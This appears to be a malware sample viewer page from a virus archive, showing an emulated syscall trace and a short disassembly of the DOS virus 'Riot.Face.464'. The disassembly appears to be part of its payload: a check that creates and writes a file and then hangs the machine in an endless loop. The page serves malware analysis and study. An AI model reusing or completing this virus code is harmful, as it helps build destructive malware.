Sample viewer

vx.netlux.org/Virus.DOS.Riot.Face.464

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:28:39.09914488Z 44 PC: 132ce | Get time 0x132ce: cmp dl, 0x58
0x132d1: jne 0x132f5
0x132d3: mov ah, 0x3c
0x132d5: mov cx, 0
0x132d8: lea dx, word ptr [bp + 0x29b]
0x132dc: int 0x21
0x132de: xchg ax, bx
0x132df: mov ah, 0x40
0x132e1: mov cx, 0x1b
0x132e4: nop
0x132e5: lea dx, word ptr [bp + 0x2ab]
0x132e9: int 0x21
0x132eb: mov ah, 0x3e
0x132ed: lea dx, word ptr [bp + 0x29b]
0x132f1: int 0x21
0x132f3: jmp 0x132f3
0x132f5: mov ah, 0x19
0x132f7: int 0x21
0x132f9: cmp al, 2
0x132fb: jb 0x1332b
2018-12-17T22:28:39.101809505Z 25 PC: 132f9 | Get default drive
2018-12-17T22:28:39.104407591Z 9 PC: 12a86 | Display string (String= 'Size change=????h/?????d. ')
2018-12-17T22:28:39.109214681Z 76 PC: 12ae3 | Terminate with return code (Return code = '240')